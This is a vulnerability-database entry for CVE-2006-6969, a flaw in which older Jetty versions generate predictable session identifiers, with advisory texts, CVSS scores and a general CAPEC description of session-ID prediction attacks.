CVE-2006-6969
published 2007-02-07CVE-2006-6969: Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which…
PriorityP424medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EPSS
1.56%
72.1th percentile
Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jetty | jetty_http_server | — | — |
| jetty | jetty_http_server | — | — |
| jetty | jetty_http_server | — | — |
| jetty | jetty_http_server | — | — |
| jetty | jetty_http_server | — | — |
| jetty | jetty_http_server | — | — |
| jetty | jetty_http_server | — | — |
| jetty | jetty_http_server | — | — |
| jetty | jetty_http_server | — | — |
| jetty | jetty_http_server | — | — |
| jetty | jetty_http_server | — | — |
| jetty | jetty_http_server | — | — |
| jetty | jetty_http_server | — | — |
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vendor_redhat6.8MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Jetty Uses Predictable Session Identifiers
ghsa·2022-05-01
CVE-2006-6969 [MEDIUM] CWE-330 Jetty Uses Predictable Session Identifiers
Jetty Uses Predictable Session Identifiers
Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks.
OSV
Jetty Uses Predictable Session Identifiers
osv·2022-05-01
CVE-2006-6969 [MEDIUM] Jetty Uses Predictable Session Identifiers
Jetty Uses Predictable Session Identifiers
Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks.
Red Hat
jetty: session identifiers session hijacking
vendor_redhat·2006-11-22·CVSS 6.8
CVE-2006-6969 [MEDIUM] CWE-340 jetty: session identifiers session hijacking
jetty: session identifiers session hijacking
Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks.
A flaw was found in Jetty that could allow a remote attacker to hijack a valid user's session due to a vulnerability in the "java.util.Random" class. When predictable naming patterns are used for session identifiers in Jetty, a remote attacker could hijack a victim's session and gain unauthorized access to the application.
Package: jetty (Red Hat Enterprise Linux 7) - Not affected
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
CAPEC
Session Credential Falsification through Prediction
mitre_capec
[HIGH] Session Credential Falsification through Prediction
CAPEC-59: Session Credential Falsification through Prediction
This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.
Execution Flow:
Step 1 [Explore]: [Find Session IDs] The attacker interacts with the target host and finds that session IDs are used to authenticate users.
Technique: An attacker makes many anonymous connections and records the session IDs assigned.
Technique: An attacker makes authorized connections and records the session tokens or credentials issued.
Step 2 [Explore]: [Characterize IDs] The attacker studies the characteristics of the session ID (size, format, etc.). As a results the attacker finds that legitimate session IDs are predictable.
Tech
http://archives.neohapsis.com/archives/bugtraq/2007-02/0070.htmlhttp://fisheye.codehaus.org/changelog/jetty/?cs=1274http://osvdb.org/33108http://secunia.com/advisories/24070http://www.securityfocus.com/archive/1/459164/100/0/threadedhttp://www.securityfocus.com/bid/22405http://www.vupen.com/english/advisories/2007/0497https://exchange.xforce.ibmcloud.com/vulnerabilities/32240http://archives.neohapsis.com/archives/bugtraq/2007-02/0070.htmlhttp://fisheye.codehaus.org/changelog/jetty/?cs=1274http://osvdb.org/33108http://secunia.com/advisories/24070http://www.securityfocus.com/archive/1/459164/100/0/threadedhttp://www.securityfocus.com/bid/22405http://www.vupen.com/english/advisories/2007/0497https://exchange.xforce.ibmcloud.com/vulnerabilities/32240
2007-02-07
Published